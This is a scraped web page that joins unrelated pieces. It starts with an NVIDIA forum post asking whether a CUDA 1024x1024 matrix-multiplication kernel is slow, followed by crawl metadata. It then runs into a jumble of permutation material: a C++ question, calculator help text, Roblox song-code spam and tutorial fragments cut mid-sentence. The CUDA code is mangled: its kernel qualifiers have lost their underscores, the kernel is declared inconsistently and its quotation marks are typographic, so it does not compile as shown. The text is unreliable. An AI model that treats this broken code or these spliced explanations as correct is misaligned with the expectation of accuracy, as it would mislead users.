GS.\n\nThis is the program I run:\n\n/* Programme Cuda pris dans le document NVIDIA CUDA: Programming Guide 2.3 (p.18 à 21)\n\n#include “stdafx.h”\n\n#include <stdio.h>\n\n#include <cuda.h>\n\ntypedef struct {\n\nint width;\n\nint height;\n\nfloat* elements;\n\n} Matrix;\n\n/* Taille des blocs de fils d’exécution */\n\n/* Les dimensions de matrice sont supposées être des multiples de BLOCK_SIZE */\n\n#define BLOCK_SIZE 16\n\n#define MSIZE 1024\n\n/* Déclaration de la matrice de multiplication à exécuter en parallèle */\n\nglobal void MulMatKernel(const Matrix, const Matrix, Matrix);\n\nint main(void)\n\n{\n\nMatrix a_h, b_h, c_h;\n\nFILE *fp1, *fp2, *fp3;\n\nfp1 = fopen(“a_h.txt”,“w”);\n\nif(fp1 == NULL) {\n\n``````printf(\"Ouverture du fichier %s impossible\\n\", \"a_h.txt\");\n\nexit(-1);\n\n}\n``````\n\nfp2 = fopen(“b_h.txt”,“w”);\n\nif(fp2 == NULL) {\n\n``````printf(\"Ouverture du fichier %s impossible\\n\", \"b_h.txt\");\n\nexit(-1);\n\n}\n``````\n\nfp3 = fopen(“c_h.txt”,“w”);\n\nif(fp3 == NULL) {\n\n``````printf(\"Ouverture du fichier %s impossible\\n\", \"c_h.txt\");\n\nexit(-1);\n\n}\n``````\n\na_h.width = MSIZE; a_h.height = MSIZE;\n\nb_h.width = MSIZE; b_h.height = MSIZE;\n\nc_h.width = MSIZE; c_h.height = MSIZE;\n\nsize_t size = MSIZE * MSIZE * sizeof(float); /* size_t = unsigned int */\n\na_h.elements = (float*)malloc(size);\n\nb_h.elements = (float*)malloc(size);\n\nc_h.elements = (float*)malloc(size);\n\nfprintf(fp1, “\\n”); /* Espace dans le fichier avant l’écriture des nombres */\n\n/* Initialisation des matrices hôte */\n\nfor (int j=0; j<a_h.height; j++)\n\n``````\tfor (int i=0; i<a_h.width; i++){\n\na_h.elements[a_h.width*j + i] = (float)rand()/RAND_MAX;\n\nfprintf(fp1, \"%f\\n\", a_h.elements[a_h.width*j + i]);\n\n}\n``````\n\nfprintf(fp2, “\\n”); /* Espace dans le fichier avant l’écriture des nombres */\n\n/* La fonction rand délivre un nombre pseudoaléatoire compris entre 0 et 32767(RAND_MAX) */\n\nfor (int j=0; j<b_h.height; j++)\n\n``````\tfor (int i=0; i<b_h.width; i++){\n\nb_h.elements[b_h.width*j + i] = (float)rand()/RAND_MAX;\n\nfprintf(fp2, \"%f\\n\", b_h.elements[b_h.width*j + i]);\n\n}\n``````\n\nfor (int j=0; j<c_h.height; j++)\n\n``````\tfor (int i=0; i<c_h.width; i++)\n\nc_h.elements[c_h.width*j + i] = 0.0;\n``````\n\nMatrix d_A, d_B, d_C;\n\nd_A.width = a_h.width; d_A.height = a_h.height;\n\nd_B.width = b_h.width; d_B.height = b_h.height;\n\nd_C.width = c_h.width; d_C.height = c_h.height;\n\ncudaMalloc((void**)&d_A.elements, size);\n\ncudaMemcpy(d_A.elements, a_h.elements, size, cudaMemcpyHostToDevice);\n\ncudaMalloc((void**)&d_B.elements, size);\n\ncudaMemcpy(d_B.elements, b_h.elements, size, cudaMemcpyHostToDevice);\n\ncudaMalloc((void**)&d_C.elements, size);\n\n/* Appel de la fonction à exécuter en parallèle sur la carte graphique */\n\ndim3 dimBlock(BLOCK_SIZE, BLOCK_SIZE);\n\ndim3 dimGrid(b_h.width / dimBlock.x, a_h.height / dimBlock.y);\n\ncudaEvent_t start, stop;\n\nfloat time;\n\ncudaEventCreate(&start);\n\ncudaEventCreate(&stop);\n\ncudaEventRecord( start, 0 ); // Début\n\nMulMatKernel<<<dimGrid, dimBlock>>>(d_A, d_B, d_C);\n\n//MulMat(a_h, b_h, c_h);\n\n// Fin de la mesure du temps d’exécution du programme\n\ncudaEventRecord( stop, 0 ); // Fin\n\ncudaEventSynchronize( stop );\n\ncudaEventElapsedTime( &time, start, stop );\n\ncudaEventDestroy( start );\n\ncudaEventDestroy( stop );\n\n// Print results\n\nprintf(\"\\n\");\n\nprintf(“Temps ecoule: %f ms\\n”, time);\n\n/* Transfert du résultat de la carte graphique à la CPU */\n\ncudaMemcpy(c_h.elements, d_C.elements, size, cudaMemcpyDeviceToHost);\n\ncudaFree(d_A.elements);\n\ncudaFree(d_B.elements);\n\ncudaFree(d_C.elements);\n\nfprintf(fp3, “\\n”); /* Espace dans le fichier avant l’écriture des nombres */\n\nfor (int i=0; i<MSIZE; i++) {\n\n``````for (int j=0; j<MSIZE; j++){\n\nif (c_h.elements[i*c_h.width + j] > MSIZE || c_h.elements[i*c_h.width + j] < 0)\n\nprintf(\"erreur = %f i = %d, j = %d\\n\", c_h.elements[i*c_h.width + j], i, j);\n\nfprintf(fp3, \"%f\\n\", c_h.elements[c_h.width*j + i]);\n\n}\n\n//printf(\"\\n\");\n``````\n\n}\n\nfclose(fp1);\n\nfclose(fp2);\n\nfclose(fp3);\n\n// Cleanup\n\nfree(a_h.elements);\n\nfree(b_h.elements);\n\nfree(c_h.elements);\n\n}\n\ndevice void MulMatKernel(Matrix A, Matrix B, Matrix C)\n\n{\n\n// Each thread computes one element of C by accumulating results into Cvalue\n\nfloat Cvalue = 0.0f;\n\nint row = blockIdx.y * blockDim.y + threadIdx.y;\n\nint col = blockIdx.x * blockDim.x + threadIdx.x;\n\n/* Calcul et rangement en colonnes pour Matlab */\n\nfor (int e = 0; e < A.width; ++e)\n\n``````Cvalue += A.elements[row * A.width + e] * B.elements[e * B.width + col];\n``````\n\nC.elements[col * C.width + row] = Cvalue;\n\n}\n\njcpao\n\nThese are the results I get from the profiler (see attached Excel document):\nprof_mulmat3.xls (14 KB)\n\nHello,\n\nI took the example of Cuda matrix multiplication using shared memory from the Programming Guide. I use two 1024 x 1024 matrix with 16 x 16 blocks. I take use 8 registers per thread. I use a GPU 8400 GS with 8 stream processors (1400 MHz).\n\nI get an execution time (for the kernel alone) of 387ms.\n\nPlease could you tell me whether it is a slow or a normal execution time?\nThank you for your help. :)\njcpao" ]
[ null, "https://aws1.discourse-cdn.com/nvidia/original/2X/3/3f301944ed0d2d0d779b3eaa251520d35458d467.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9198896,"math_prob":0.96779776,"size":1671,"snap":"2020-24-2020-29","text_gpt3_token_len":424,"char_repetition_ratio":0.09358128,"word_repetition_ratio":0.08387097,"special_character_ratio":0.26271695,"punctuation_ratio":0.101983,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.989563,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-07T12:00:27Z\",\"WARC-Record-ID\":\"<urn:uuid:01bda1eb-0e3c-41ec-af1b-9ec773abe9cc>\",\"Content-Length\":\"41989\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9f9b2a62-18ac-40e6-80b2-a52e5856e6a7>\",\"WARC-Concurrent-To\":\"<urn:uuid:6e10b86a-0def-457a-8336-4eb78f8fa78d>\",\"WARC-IP-Address\":\"65.19.128.98\",\"WARC-Target-URI\":\"https://forums.developer.nvidia.com/t/cuda-matrix-multiplication-too-slow/14877\",\"WARC-Payload-Digest\":\"sha1:BAO4EYA2K2EVAINP3WU4ZNROUQEHBIW2\",\"WARC-Block-Digest\":\"sha1:HDDFC35BXLE5ZCHOET7OI5KHRTJAMLRC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655892516.24_warc_CC-MAIN-20200707111607-20200707141607-00597.warc.gz\"}"}
http://pgamo.com/die-hard-ahuwa/d1f722-find-permutation-id
[ "This C Program To Permute all letters of a string without Recursion makes use of Pointers. The number that you see after it is your numeric Facebook ID. A convenient feature of cycle notation is that one can find a permutation's inverse simply by reversing the order of the elements in the permutation's cycles. Details. ABC, ACB, BAC, BCA, CBA, CAB. Under what conditions does a Martial Spellcaster need the Warcaster feat to comfortably cast spells? Combinations and Permutations What's the Difference? Similarly, permutation(3,3) will be called at the end. Easiest way to convert int to string in C++. The \"has\" rule which says that certain items must be included (for the entry to be included).. Can an exiting US president curtail access to Air Force One from the new president? Given a positive integer n and a string s consisting only of letters D or I, you have to find any permutation of first n positive integer that satisfy the given input string. \", however it took...176791 to get to \"helloworld!\" But {c,d,e,f} is not, because there is no item before c. {Alex,Betty,Carol,John} {Alex,Betty,John,Carol} {Alex,Carol,Betty,John} {Alex,Carol,John,Betty} {Alex,John,Betty,Carol} {Alex,John,Carol,Betty} {Betty,Alex,Carol,John} {Betty,Alex,John,Carol} {Betty,Carol,Alex,John} {Carol,Alex,Betty,John} {Carol,Alex,John,Betty} {Carol,Betty,Alex,John}. Now consider the permutation: { 5, 1, 4, 3, 2 }. In other words: \"My fruit salad is a combination of apples, grapes and bananas\" We don't care what order the fruits are in, they could also be \"bananas, grapes and apples\" or \"grapes, apples and bananas\", its the same fruit salad. #31 Next Permutation. In this specific case it's 176790 but there's nothing in the math world that can direct permutations towards legible words. Both packing and unpacking is a straightforward process. Why is reading lines from stdin much slower in C++ than Python? If the permutation function finds permutations recursively, a way must exist that the user can process each permutation. Is there any difference between \"take the initiative\" and \"show initiative\"? The word \"no\" followed by a space and a number. Is there a ways so I can just input: 176791 to quickly permutate to \"helloworld!\"? Conflicting manual instructions? Scenario: I have 13 digit alpha numeric data (00SHGO8BJIDG0) I want a coding to interchange S to 5, I to 1 and O to 0 and vise versa. Permutation is the different arrangements that a set of elements can make if the elements are … C++11 introduced a standardized memory model. What is the point of reading classics over modern treatments? :) I'll go do some more research, Podcast 302: Programming in PowerPoint can teach you a few things. 14 in factoradics -> 2100. Now simply interpret that array as a N-digit number in base N. I.e. number of things n: n≧r≧0; number to be taken r: permutations nPr . Properly constructed encodings will all occupy the same number of bits. Permutation - Combination Calculator is a convenient tool that helps you calculate permutations and combinations with or without repetitions. At this point, we have to make the permutations of only one digit with the index 3 and it has only one permutation i.e., itself. A permutation is an arrangement of objects in which the order is important (unlike combinations, which are groups of items where order doesn't matter).You can use a simple mathematical formula to find the number of different possible ways to order the items. Basically, it looks like you are looking for a way to \"encode\" a permutation by an integer. Hard #33 Search in Rotated Sorted Array. Anyway, this should be a rather well-researched subject and a simple Google search should turn up lots of information on encoding permutations. The word \"pattern\" followed by a space and a list of items separated by commas. The number of permutations with repetition (or with replacement) is simply calculated by: where n is the number of things to choose from, r number of times. Naive Approach: Find lexicographically n-th permutation using STL.. I want to find the 1,000,000-th permutation in lexicographic order of S. It is a programming puzzle, but I wanted to figure out a way without brute-forcing the task. De ID van je hardware vinden. How many presidents had decided not to attend the inauguration of their successor? P e r m u t a t i o n s (1) n P r = n! Find all permutation $\\alpha \\in S_7$ such that $\\alpha^3 = (1234)$ Clearly, there is more than one such permutation as $\\alpha$ could be a $4$-cycle with elements $1,2,3,4$ or $\\alpha$ could be a $4$-cycle of elements $1,2,3,4$ and a $3$-cycle of elements $5,6,7$. But different encodings will might use different integers to encode the same permutation. So {a,b,f} is accepted, but {a,e,f} is rejected. The order of arrangement of the object is very crucial. In that case, why don't you just use. {a,b,c} {a,b,d} {a,b,e} {a,c,d} {a,c,e} {a,d,e} {b,c,d} {b,c,e} {b,d,e} {c,d,e}, {a,c,d} {a,c,e} {a,d,e} {b,c,d} {b,c,e} {b,d,e} {c,d,e}, The entries {a,b,c}, {a,b,d} and {a,b,e} are missing because the rule says we can't have 2 from the list a,b (having an a or b is fine, but not together). Data races Some (or all) of the objects in both ranges are accessed (possibly multiple times each). In this case you know it because you did the full iteration. What's the best time complexity of a queue that supports extracting the minimum? your coworkers to find and share information. The variable id is a cycle as this is more convenient than a zero-by-one matrix.. Function is.id() returns a Boolean with TRUE if the corresponding element is the identity, and FALSE otherwise. In this post, we will discuss how to find permutations of a string using iteration. Just copy and play it in your Roblox game. Vector, next, contains the next permutation. The number says how many (minimum) from the list are needed for that result to be allowed. Here (If N is a power of 2, this representation will simply pack the original array values into a bit-array). Recall from the Even and Odd Permutations as Products of Transpositions page that a permutation is said to be even if it can be written as a product of an even number of transpositions, and is said to be odd if it can be written as a product of an odd number of transpositions. Easy #36 Valid Sudoku. In mathematics, when X is a finite set with at least two elements, the permutations of X (i.e. Will allow if there is an a and b, or a and c, or b and c, or all three a,b and c. In other words, it insists there be at least 2 of a or b or c in the result. These methods are present in an itertools package. How would you determine how far you need to jump? Then a comma and a list of items separated by commas. It is relatively straightforward to find the number of permutations of $$n$$ elements, i.e., to determine cardinality of the set $$\\mathcal{S}_{n}$$. @CPPNoob: Well, again, the question I'm asking is: how important is it to represent that specific permutation by integer, Well, thanks everyone for their input. Should the stipend be paid if working remotely? How can a Z80 assembly program find out the address stored in the SP register. I have this question listed on my Stackoverflow.com account as well. Easy #36 Valid Sudoku. Complexity If both sequence are equal (with the elements in the same order), linear in the distance between first1 and last1. Details. Worked immediately, saving a ton of time trying to find the “right” combo. Home / Mathematics / Permutation and combination; Calculates the number of permutations of n things taken r at a time. index[old position] = new position. Note: Assume that the inputs are such that Kth permutation of N number is always possible. Notes. So {a,e,f} is accepted, but {d,e,f} is rejected. Medium #34 Find First and Last Position of Element in Sorted Array. Start with the first digit ->2, String is ‘abcd’. Here's a SO link that offers a much deeper analysis of this topic, Fast permutation -> number -> permutation mapping algorithms, site design / logo © 2021 Stack Exchange Inc; user contributions licensed under cc by-sa. Python provides a package to find permutations and combinations of the sequence. Stack Overflow for Teams is a private, secure spot for you and It is relatively straightforward to find the number of permutations of $$n$$ elements, i.e., to determine cardinality of the set $$\\mathcal ... that composition is not a commutative operation, and that composition with \\(\\mbox{id}$$ leaves a permutation unchanged. So it took 176791 permutation to permutate the string into \"helloworld!\". We have 4 choices (A, C, G an… Permutation Calculator . permutations, obviously. PostGIS Voronoi Polygons with extend_to parameter. If you choose two balls with replacement/repetition, there are permutations: {red, red}, {red, blue}, {red, black}, {blue, red}, {blue, blue}, {blue, black}, {black, red}, {black, blue}, and {black, black}. And how is it going to affect C++ programming? So my thinking was like this: For 10 variable symbol positions, we have 10! Colleagues don't congratulate me or cheer me on when I do good work. Hard #33 Search in Rotated Sorted Array. For help making this question more broadly applicable, Stack Overflow works best with JavaScript enabled, Where developers & technologists share private knowledge with coworkers, Programming & related technical career opportunities, Recruit tech talent & build your employer brand, Reach developers & technologists worldwide. The identity permutation is problematic because it potentially has zero size. How do you find the order of Permutations? What People Are Saying “Awesome tool! The Order of a Permutation Definition: If $\\sigma$ is a permutation of the elements in $\\{ 1, 2, ..., n \\}$ then the order of $\\sigma$ denoted $\\mathrm{order} (\\sigma) = m$ is the smallest positive integer $m$ such that $\\sigma^m = \\epsilon$ where $\\epsilon$ is the identity permutation. Book about an AI that traps people on a spaceship. Given a starting permutation, you can calculate how many permutations it will take to get a certain value, given a starting value. are 2 and 1 or 2!. - Feature: + Lightweight and works fast: uses smart algorithms for calculating and converting the result to string, able to calculate large numbers in a very short time. 'D' represents a decreasing relationship between two numbers, 'I' represents an increasing relationship between two numbers. You can get the ID yourself by going to the profile, right click with your mouse and click \"View page source\", then search for the value \"entity_id\", \"fb://profile/\", \"fb://group/\" or \"fb://page/. Efficient Approach: Mathematical concept for solving this problem. It dispatches to either is.id.cycle() or is.id.word() as appropriate. To construct an arbitrary permutation of $$n$$ elements, we can proceed as follows: First, choose an integer … The remaining numbers of 4! Medium #32 Longest Valid Parentheses. Value. Now we want to find the first symbol. Find Permutation Average Rating: 4.81 (32 votes) June 7, 2017 | 17.2K views By now, you are given a secret signature consisting of character 'D' and 'I'. Showing that the language L={⟨M,w⟩ | M moves its head in every step while computing w} is decidable or undecidable. It dispatches to either is.id.cycle() or is.id.word() as appropriate. For eg, string ABC has 6 permutations. For an in-depth explanation of the formulas please visit Combinations and Permutations. Medium #35 Search Insert Position. The inverse of a permutation f is the inverse function f-1. What species is Adira represented as by the holo in S3E13? Medium #34 Find First and Last Position of Element in Sorted Array. For an in-depth explanation please visit Combinations and Permutations. Step 2: Enter up to three domains at which this contact is likely to have an email address. i.e. What are the differences between a pointer variable and a reference variable in C++? Why not you give it a try and come up with another solution? It has rejected any with a and b, or a and c, or b and c, or even all three a,b and c. So {a,d,e) is allowed (only one out of a,b and c is in that), But {b,c,d} is rejected (it has 2 from the list a,b,c), {a,b,d} {a,b,e} {a,c,d} {a,c,e} {a,d,e} {b,c,d} {b,c,e} {b,d,e} {c,d,e}, Only {a,b,c} is missing because that is the only one that has 3 from the list a,b,c. If you're working with combinatorics and probability, you may need to find the number of permutations possible for an ordered set of items. The idea is to sort the string & repeatedly calls std::next_permutation to generate the next greater lexicographic permutation of a string, in order to print all permutations of the string. A more compact representation should be possible. The identity permutation, which consists only of 1-cycles, can be denoted by a single 1-cycle (x), by the number 1, or by id. For the first part of this answer, I will assume that the word has no duplicate letters. A valid representation of a permutation will not have repetitive values in the index array. A permutation cycle is a set of elements in a permutation which trade places with one another. also could you calculate complexity of this algorithm, to me it looks n*!n because loop will run for n times and for each n, we will call permutation method. The number of permutations on the set of n elements is given by n! Im doing a small project using permutation and combination rules. For example Hard #38 Count and Say. This question is unlikely to help any future visitors; it is only relevant to a small geographic area, a specific moment in time, or an extraordinarily narrow situation that is not generally applicable to the worldwide audience of the internet. And thus, permutation(2,3) will be called to do so. Step 1: Enter name information for your contact into the fields provided, including nickname (Jeff vs Jeffery) and middle name (middle initial ok) if available. The total number of permutation of a string formed by N characters(all distinct) is N! Easy #39 Combination Sum. That's all on how to find all permutations of a String in Java using recursion.It's a very good exercise for preparing Java coding interviews. The solution is a function pointer that takes in a parameter of the type std::vector. rev 2021.1.8.38287, Sorry, we no longer support Internet Explorer. To calculate the amount of permutations of a word, this is as simple as evaluating n!, where n is the amount of letters. Permutations can be encoded by integers in several different ways. In our below problem, I am trying to find the permutation of n elements of an array taking all the n at a time, so the result is !n There are many ways to solve, but per Wikipedia article on Heap’s Algorithm : “In a 1977 review of permutation-generating algorithms, Robert Sedgewick concluded that it was at that time the most effective algorithm for generating permutations by computer”. Just enter the relevant first name, last name, and domain name: See the Pen YXNrbO by Steffon on CodePen. Roblox Song Codes - Roblox Audio Catalog - Musica Roblox. Heb je hardware in je computer die niet goed functioneert en je weet niet zeker wat voor hardware het is of wie de fabrikant is, dan kun je de Hardware-ID van het apparaat gebruiken om dit te achterhalen. I am using permutation to generate a string (using each of its character) into \"helloworld! The article is about writing a Code to find permutation of numbers, the program prints all possible permutations of a given list or array of numbers. For example, you have a urn with a red, blue and black ball. So I’ve made the javascript below to generate common email address permutations for you. The \"has\" rule which says that certain items must be included (for the entry to be included). Active 8 years ago. The identity permutation is problematic because it potentially has zero size. In this permutation and combination math tutorial, we will learn how to find the number of possible arrangements in a set of objects. Moreover, since each permutation π is a bijection, one can always construct an inverse permutation π−1 such that π π−1 =id.E.g., 123 231 123 312 = 12 3 In this post, we will see how to find permutations of a string containing all distinct characters. It requires more bits than necessary, since it attempts to \"losslessly\" encode index arrays with non-unique values. Call it id n = 12 n = (1)(2) (n) It satisfies f id n = id n f = f . So, we can now print this permutation as no further recursion is now need. But it is not clear whether this encoding is required to be synchronized with permutation sequence generated by sequential calls to std::next_permutation. Then a comma and a list of items separated by commas. Python Math: Exercise-16 with Solution. Find out how many different ways to choose items. The permutation is an arrangement of objects in a specific order. @CPPNoob: Actually it is slow because of all those, What jogojapan is saying is - how do you know WHICH permutation will give you your expected result? $\\alpha$ cannot be a product of any disjoint transpositions as $(ij)^3 = (ij)$. What's the difference between 'war' and 'wars'? This immediately means that the above representation is excessive. In English we use the word \"combination\" loosely, without thinking if the order of things is important. Medium #32 Longest Valid Parentheses. Medium #40 Combination Sum II. Medium #37 Sudoku Solver. The C program prints all permutations of the string without duplicates. In particular, note that the result of each composition above is a permutation, that compo-sition is not a commutative operation, and that composition with id leaves a permutation unchanged. I can understand that the question is a bit \"abstract\". How can I quickly grab items from a chest to my inventory? The identity permutation on [n] is f (i) = i for all i. Permutation Id..? For e.g. Example: has 2,a,b,c means that an entry must have at least two of the letters a, b and c. The \"no\" rule which means that some items from the list must not occur together. Active 8 years ago. func is a callback function that you define. Unfortunately, the representation I describe above is not well-constructed. Length of given string s will always equal to n - 1; Your solution should run in linear time and space. means (n factorial). P e r m u t a t i o n s (1) n P r = n! So, if you need help with your algebra or geometry homework, watch this. If we need to find the 14th permutation of ‘abcd’. Imports System.Collections.Generic Imports System.Linq Imports System.Xml.Linq Module Module1 Private IDToFind As String = \"bk109\" Public Books As New List(Of Book) Sub Main() FillList() ' Find a book by its ID. That's what you want? ; The Total number of permutation of a string formed by N characters (where the frequency of character C1 is M1, C2 is M2… and so the frequency of character Ck is Mk) is N!/(M1! Medium #35 Search Insert Position. Is it? That's a start on the algorithm. In general, for n objects n! To know the opinions of other people on the same and to find out other ways to solve the problem, please visit the link A 6-letter word has 6! Example: pattern c,* means that the letter c must be first (anything else can follow), Combinations of a,b,c,d,e,f,g that have at least 2 of a,b or c. The word \"has\" followed by a space and a number. In R: A biological example of this are all the possible codon combinations. And the problem is that, it took few minutes (even without printf or cout). Given two integers N and K, find the Kth permutation sequence of numbers from 1 to N without using STL function. In this example, we used the first two numbers, 4 and 3 of 4!. An arrangement of a set of objects in a certain order is called a PERMUTATION. D means the next number is smaller, while I means the next number is greater. The variable id is a cycle as this is more convenient than a zero-by-one matrix.. Function is.id() returns a Boolean with TRUE if the corresponding element is the identity, and FALSE otherwise. I need your support on this please. Vector, now, is the current permutation. That is, how would you determine the number 176791? Think about how you'd calculate how many permutations it'd require to change the first character to the next lexicographically higher character. How can I profile C++ code running on Linux? We can in-place find all permutations of a given string by using Backtracking. We can also sort the string in reverse order Will allow if there is an a, or b, or c, or a and b, or a and c, or b and c, or all three a,b and c. In other words, it insists there be an a or b or c in the result. The number says how many (minimum) from the list are needed to be a rejection. The idea is to swap each of the remaining characters in the string.. Where k is the number of objects, we take from the total of n … To write out all the permutations is usually either very difficult, or a very long task. What is Permutation of a String? Viewed 414 times 1. Example: has 2,a,b,c means that an entry must have at least two of the letters a, b and c. I'm not sure what the question is about. the permutation is represented by an integer value. I.e do you require that number 176791 encodes a permutation produced by 176791 applications of std::next_permutation? Easy #39 Combination Sum. Anyway, if you don't care about a specific encoding method, then any permutation for N elements can be encoded in the following manner: Imagine the canonical representation of the permutation: an array of N indexes that describe the new positions of the sequence's elements, i.e. The project is that if I have the … Please let me rephrase. Join Stack Overflow to learn, share knowledge, and build your career. Examples: Input: N = 3, K = 4 Output: 231 Explanation: The ordered list of permutation sequence from integer 1 to 3 is : 123, 132, 213, 231, 312, 321. PRO LT Handlebar Stem asks to tighten top handlebar screws first before bottom screws? What does it mean? Value. I'm trying to write a function that does the following: takes an array of integers as an argument (e.g. Even if Democrats have control of the senate, won't new legislation just be blocked with a filibuster? (n − r)! The results can be used for studying, researching or any other purposes. Permutation Id..? C++ [closed] Ask Question Asked 8 years ago. #31 Next Permutation. C++ [closed] Ask Question Asked 8 years ago. Means \"any item, followed by c, followed by zero or more items, then f\", And {b,c,f,g} is also allowed (there are no items between c and f, which is OK). Learn How To Find Permutations of String in C Programming. Example: no 2,a,b,c means that an entry must not have two or more of the letters a, b and c. The \"pattern\" rule is used to impose some kind of pattern to each entry. Suppose we have 4 objects and we select 2 at a time. Write a Python program to print all permutations of a given string (including duplicates). =6*5*4*3*2*1=720 different permutations. Step 3: Click 'Permutate' and copy the resulting email addresses. We have 2 MILION+ newest Roblox music codes for you. Otherwise, up to quadratic: Performs at most N 2 element comparisons until the result is determined (where N is the distance between first1 and last1). Basically, the canonical array representation of the original permutation is packed into a sufficiently large integer value. To find the number of permutations of a certain set, use the factorial notation. Viewed 414 times 1. Divided by (n-k)! In mathematics, the notion of permutation relates to the act of arranging all the members of a set into some sequence or order, or if the set is already ordered, rearranging (reordering) its elements, a process called permuting. P = { 5, 1, 4, 2, 3 }: Here, 5 goes to 1, 1 goes to 2 and so on (according to their indices position): 5 -> 1 1 -> 2 2 -> 4 4 -> 3 3 -> 5 Thus it can be represented as a single cycle: (5, 1, 2, 4, 3). You can also modify the code to print permutations of a string with duplicates. So the question is, is there any way where as I can simply input 176791 to quickly permutate or ( rotate, swap, etc ) to get the string to have the value of \"helloworld!\"? Combination and permutation are a part of Combinatorics. Hard #38 Count and Say. Medium #37 Sudoku Solver. Function pointer that takes in a parameter of the objects in both ranges are accessed ( possibly multiple each. To write out all the permutations of a string formed by n characters ( all ). More research, Podcast 302: Programming in PowerPoint can teach you a few.... ( using each of the string into helloworld! with duplicates is Adira represented by. A valid representation of the sequence in both ranges are accessed ( possibly multiple times each ) order,... Permutations of a certain set, use the word combination '' loosely, without thinking the! Permutations can be encoded by integers in several different ways to choose items array as a number... Warcaster feat to comfortably cast spells one from the new president f is. Studying, researching or any other purposes how is it going to affect C++ Programming print all of. A product of any disjoint transpositions as $( ij ) ^3 = ( ij ).... 5 * 4 * 3 * 2 * 1=720 different permutations also modify the code to print all permutations a. Places with one another music codes for you Programming in PowerPoint can teach you a few things take the ''... Determine the number says how many ( minimum ) from the list are needed to a! Secure spot for you permutations nPr permutation by an integer a starting,! Point of reading classics over modern treatments to quickly permutate to encode '' a permutation cycle is power... Because it potentially has zero size between take the initiative '' and initiative! Containing all distinct characters 'm not sure what the question is a finite set with at two. A product of any disjoint transpositions as$ ( ij ) $share information of! Case it 's 176790 but there 's nothing in the string without recursion makes use of Pointers, blue black... Basically, the canonical array representation of a set of n things r... F is the point of reading classics over modern treatments many ( minimum ) from the new?! Occupy the same permutation time complexity of a string without recursion makes use Pointers... The Kth permutation of n things taken r at a time you determine how far need... R m u t a t I o n s ( 1 ) n p r = n play in! N'T you just use Martial Spellcaster need the Warcaster feat to comfortably cast spells order ) linear. Of string in C Programming exiting US president curtail access to Air one... To the next number is greater helloworld! elements, the permutations of a string all. To encode the same permutation take the initiative '' step 2: up! That case, why do n't congratulate me or cheer me on when I do good work in the register. That Kth permutation sequence generated by sequential calls to std::vector < t > ij ) ^3 = ij. It attempts to helloworld! of its character ) into helloworld! and thus, permutation 3,3! Will always equal to n - 1 ; your solution should run in linear and... Containing all distinct characters is your numeric Facebook ID very crucial ( including )... Are … # 31 next permutation CBA, CAB one another take the initiative '' the. Printf or cout ) specific order t a t I o n s ( 1 n. It dispatches to either is.id.cycle ( ) or is.id.word ( ) or is.id.word )... Permutations for you and your coworkers to find permutations of a given string s always! Order is called a permutation produced by 176791 applications of std::vector < t > the relevant name. What the question is about called a permutation which trade places with one another t a t I o s... Far you need to find permutations of a string with duplicates decided not to attend the inauguration of successor. Control of the type std::vector < t > the code to all..., Sorry, we used the first digit - > 2, string is ‘abcd’ running on Linux Musica.! Permutation is problematic because it potentially has zero size remaining characters in the math world that can direct towards. To quickly permutate to helloworld! comfortably cast spells with a red, blue black. 2 at a time least two elements, the representation I describe above is not clear this... [ n ] is f ( I ) = I for all I out all the possible codon combinations of... And space Some ( or all ) of the type std::vector < t > C++ code on! Pack the original permutation is problematic because it potentially has zero size Z80! Mathematics, when X is a private, secure spot for you your! Have 10 difference between take the initiative '' 'Permutate ' and '! To write out all the possible codon combinations my Stackoverflow.com account as well up lots information... One another like you are looking for a way to convert int to string C++! All I I have this question listed on my Stackoverflow.com account as well first digit - 2... Be blocked with a filibuster, this representation will simply pack the original permutation is problematic because it potentially zero... Im doing a small project using permutation and combination rules swap each of the remaining characters in the register! Permutations and combinations of the remaining characters in the distance between first1 and last1 1 to n without using..... The set of objects in both ranges are accessed ( possibly multiple times each.. Before bottom screws case you know it because you did the full.. Now consider the permutation: { 5, 1, 4, 3, 2 } use. The permutations of a string with duplicates disjoint transpositions as$ ( ij ) $write out all the codon..., CBA, CAB will always equal to n - 1 ; your solution should find permutation id in time. Things is important like find permutation id: for 10 variable symbol positions, we have 4 (! Music codes for you do n't you just use must be included ) you just use array representation of objects... Permutation on [ n ] is f ( I ) = I for all I I represents... Be used for studying, researching or any other purposes because it has! We select 2 at a time build your career queue that supports extracting the minimum worked immediately saving. Whether this encoding is required to be allowed how to find the Kth permutation sequence generated by calls. Few minutes ( even without printf or cout ) # 31 next permutation run linear! 34 find first and Last Position of Element in Sorted array as appropriate the point of reading over... Took few minutes ( even without printf find permutation id cout ) needed to be (... Attempts to encode '' a permutation which trade places with one another an increasing between! That certain items must be included ( for the first part of Combinatorics are needed to be synchronized permutation. The javascript below to generate a string with duplicates this encoding find permutation id required to be allowed 'd require to the... With a red, blue and black ball can process each permutation in S3E13 the number says how many had! No duplicate letters would you determine the number of things is important or cout ) is always possible n a. If n is a function pointer that takes in a certain value, given starting! Internet Explorer find out the address stored in the distance between first1 and last1 because you did the full.... Differences between a pointer variable and a list of items separated by commas repetitive values in the index array,! With duplicates using iteration specific case it 's 176790 but there 's nothing in the distance between first1 and.! Or geometry homework, watch this separated by commas all permutations of a string with duplicates integers to encode same! To helloworld! requires more bits than necessary, since it attempts to encode... Permutations recursively, a way to losslessly '' encode index arrays with non-unique.. Anyway, this should be a rejection in that case, why do n't you just use, secure for. Means the next number is always possible you can also modify the code to print permutations! Under what conditions does a Martial Spellcaster need the Warcaster feat to comfortably cast spells above. Digit - > 2, this should be a product of any disjoint transpositions$! From 1 to n without using STL function no further recursion is now need abstract '' I. Did the full iteration things taken r at a time, you have a urn with a filibuster Asked. That helps you calculate permutations and combinations of the string either is.id.cycle ( ) as appropriate zero size to permutations! How many permutations it 'd require to change the first part of Combinatorics permutation you... That the inputs are such that Kth permutation of ‘abcd’ an increasing relationship two... Very long task I o n s ( 1 ) n p r =!! Email address so my thinking was like this: for 10 variable symbol positions, we have 2 newest... For the entry to be a product of any disjoint transpositions as $( ij$. Next permutation decreasing relationship between two numbers ) of the senate, wo n't new legislation be! Generate a string with 